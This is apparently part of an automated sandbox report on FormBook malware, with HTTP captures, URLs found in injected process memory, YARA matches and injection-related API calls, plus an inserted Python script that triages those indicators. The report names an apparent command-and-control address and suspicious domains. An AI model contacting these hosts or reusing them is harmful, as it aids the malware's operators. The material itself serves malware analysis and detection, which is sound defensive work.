content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:07:02 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:07:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-sorting-hat-podid: 156x-sorting-hat-shopid: 68129128605vary: Accept-Encoding,Acceptx-frame-options: DENYx-shopid: 68129128605x-shardid: 156content-language: en-INx-shopify-nginx-no-cookies: 0set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:51 GMT; SameSite=Laxset-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:51 GMT; SameSite=Laxset-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 12:07:51 GMT; SameSite=Laxset-cookie: _shopify_y=2a006b9e-2410-43a9-ad69-41888273dea8; Expires=Thu, 09-Oct-25 12:07:51 GMT; Domain=zingara.life; Path=/; SameSite=Laxset-cookie: _shopify_s=25a32db8-d952-465f-870e-9f90c6ffc1bd; Expires=Wed, 09-Oct-24Data Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:07:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-sorting-hat-podid: 156x-sorting-hat-shopid: 68129128605vary: Accept-Encoding,Acceptx-frame-options: DENYx-shopid: 68129128605x-shardid: 156content-language: en-INx-shopify-nginx-no-cookies: 0set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:53 GMT; SameSite=Laxset-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:53 GMT; SameSite=Laxset-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 12:07:54 GMT; SameSite=Laxset-cookie: _shopify_y=f1994b7a-4418-4777-9882-f971f0cbd2e4; Expires=Thu, 09-Oct-25 12:07:54 GMT; Domain=zingara.life; Path=/; SameSite=Laxset-cookie: _shopify_s=8e62383f-c62d-45d6-a9c4-12d0e528e322; Expires=Wed, 09-Oct-24Data Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:07:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-sorting-hat-podid: 156x-sorting-hat-shopid: 68129128605vary: Accept-Encoding,Acceptx-frame-options: DENYx-shopid: 68129128605x-shardid: 156content-language: en-INx-shopify-nginx-no-cookies: 0set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:56 GMT; SameSite=Laxset-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:56 GMT; SameSite=Laxset-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 12:07:56 GMT; SameSite=Laxset-cookie: _shopify_y=8a594a9b-e5d6-46f6-b3bc-dacfbc7bea45; Expires=Thu, 09-Oct-25 12:07:56 GMT; Domain=zingara.life; Path=/; SameSite=Laxset-cookie: _shopify_s=022fb35b-4924-43c4-88bf-911b01658e63; Expires=Wed, 09-Oct-24Data Raw: Data Ascii:
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 09 Oct 2024 12:08:39 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 09 Oct 2024 12:08:42 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 09 Oct 2024 12:08:47 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: typeperf.exe, 0000000C.00000002.3739193871.0000000003E38000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3740970787.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000002.3737715494.0000000003098000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://156.226.108.99:28888/
            Source: uxEGEjhWYrJv.exe, 0000000E.00000002.3739752184.0000000004E1B000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.allthingsjasmin.com
            Source: uxEGEjhWYrJv.exe, 0000000E.00000002.3739752184.0000000004E1B000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.allthingsjasmin.com/eysm/
            Source: typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: typeperf.exe, 0000000C.00000002.3730128385.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: typeperf.exe, 0000000C.00000002.3730128385.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: typeperf.exe, 0000000C.00000002.3730128385.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: typeperf.exe, 0000000C.00000002.3730128385.000000000099F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: typeperf.exe, 0000000C.00000002.3730128385.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: typeperf.exe, 0000000C.00000002.3730128385.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: typeperf.exe, 0000000C.00000003.1871640910.0000000007AD9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: typeperf.exe, 0000000C.00000002.3739193871.0000000004AC8000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3740970787.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000002.3737715494.0000000003D28000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
            Source: typeperf.exe, 0000000C.00000002.3739193871.0000000004936000.00000004.10000000.00040000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000002.3737715494.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://zingara.life/s7qk?ZZY=iaY
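            The rows above are the report's table cells flattened to text. The script below is a worked example added here, not code from the Joe Sandbox report: it parses such "String found in binary or memory" rows, groups each URL by the process and memory dump it was carved from, and flags two things worth checking when triaging a FormBook report: URLs that recur in more than one process (here 156.226.108.99:28888, www.google.com and zingara.life appear in both typeperf.exe and uxEGEjhWYrJv.exe, which is what injecting the same payload into several hosts looks like) and URLs carved from executable rather than plain read/write memory. Its reading of the dotted dump name as pid, stage, dump id, address, page protection, and the test of the PAGE_EXECUTE bits on the protection field are assumptions about the naming scheme, not something the report states; the function names are mine and the sample rows are a constructed subset of the rows listed above.

```python
"""IOC triage over Joe Sandbox "String found in binary or memory" rows.

Added example, not part of the original report. Assumption: the dotted dump
name is <pid>.<stage>.<dump id>.<address>.<protect>.<?>.<?>.<?>.sdmp with
<pid> in hex and <protect> a Win32 PAGE_* value (0x40 = PAGE_EXECUTE_READWRITE).
"""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Set

# Constructed sample: a subset of the report rows, copied verbatim (with a
# " | " between the source cell and the finding cell; the parser also accepts
# the run-together form produced by the text export).
SAMPLE_ROWS = """\
Source: typeperf.exe, 0000000C.00000002.3739193871.0000000003E38000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 0000000C.00000002.3740970787.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000002.3737715494.0000000003098000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://156.226.108.99:28888/
Source: uxEGEjhWYrJv.exe, 0000000E.00000002.3739752184.0000000004E1B000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.allthingsjasmin.com/eysm/
Source: typeperf.exe, 0000000C.00000002.3741075036.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: typeperf.exe, 0000000C.00000002.3739193871.0000000004936000.00000004.10000000.00040000.00000000.sdmp, uxEGEjhWYrJv.exe, 0000000E.00000002.3737715494.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://zingara.life/s7qk?ZZY=iaY
"""

# Lazy ".+?" stops at the last ".sdmp" before the finding label, so rows that
# list several dumps are captured whole. The "|" is optional on purpose.
ROW_RE = re.compile(
    r"Source:\s*(?P<sources>.+?\.sdmp)\s*\|?\s*"
    r"String found in binary or memory:\s*(?P<url>\S+)"
)
DUMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<stage>\d{8})\.(?P<dump>\d+)\."
    r"(?P<addr>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.sdmp$"
)
PAGE_EXECUTE_MASK = 0xF0  # PAGE_EXECUTE | _READ | _READWRITE | _WRITECOPY


class Hit(NamedTuple):
    process: str
    pid: int
    dump_id: str
    address: int
    protect: int


def parse_rows(text: str) -> Dict[str, List[Hit]]:
    """Map each URL to the (process, dump) pairs it was carved from."""
    hits: Dict[str, List[Hit]] = defaultdict(list)
    for line in text.splitlines():
        m = ROW_RE.search(line)
        if not m:
            continue
        # The source cell alternates "name.exe, <dump>, name.exe, <dump>, ...".
        parts = [p.strip() for p in m["sources"].split(",")]
        for name, dump in zip(parts[0::2], parts[1::2]):
            d = DUMP_RE.match(dump)
            if d is None:
                continue  # unrecognised dump name: skip rather than guess
            hits[m["url"]].append(Hit(name, int(d["pid"], 16), d["dump"],
                                      int(d["addr"], 16), int(d["protect"], 16)))
    return dict(hits)


def shared_across_processes(hits: Dict[str, List[Hit]]) -> Dict[str, Set[int]]:
    """URLs present in two or more distinct processes, with their pid sets."""
    by_pid = {url: {h.pid for h in hs} for url, hs in hits.items()}
    return {url: pids for url, pids in by_pid.items() if len(pids) > 1}


def urls_in_executable_memory(hits: Dict[str, List[Hit]]) -> List[str]:
    """URLs carved from a region whose protection has a PAGE_EXECUTE_* bit."""
    return sorted(url for url, hs in hits.items()
                  if any(h.protect & PAGE_EXECUTE_MASK for h in hs))


def triage(text: str) -> dict:
    hits = parse_rows(text)
    return {"shared": shared_across_processes(hits),
            "executable": urls_in_executable_memory(hits)}


if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    for url, pids in result["shared"].items():
        print(f"shared across pids {sorted(pids)}: {url}")
    for url in result["executable"]:
        print(f"in executable memory: {url}")
```

            Run stand-alone it prints the two lists for the sample. Fed the full set of rows, the split is informative: the ecosia, duckduckgo, yahoo and login.live.com strings occur only in typeperf.exe and in read/write regions, consistent with the browser-data harvesting the report flags, while the strings the two injected processes have in common are the ones to treat as indicators.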

            E-Banking Fraud

            Source: Yara match | File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.1688985587.0000000009690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.1671982092.00000000067E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3737482520.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.3739752184.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 00000009.00000002.1688985587.0000000009690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 00000009.00000002.1671982092.00000000067E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 0000000B.00000002.3737482520.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: 0000000E.00000002.3739752184.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0042C723 NtClose | 9_2_0042C723
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C735C0 NtCreateMutant,LdrInitializeThunk | 9_2_03C735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72B60 NtClose,LdrInitializeThunk | 9_2_03C72B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk | 9_2_03C72DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C74340 NtSetContextThread | 9_2_03C74340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C73090 NtSetValueKey | 9_2_03C73090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C73010 NtOpenDirectoryObject | 9_2_03C73010
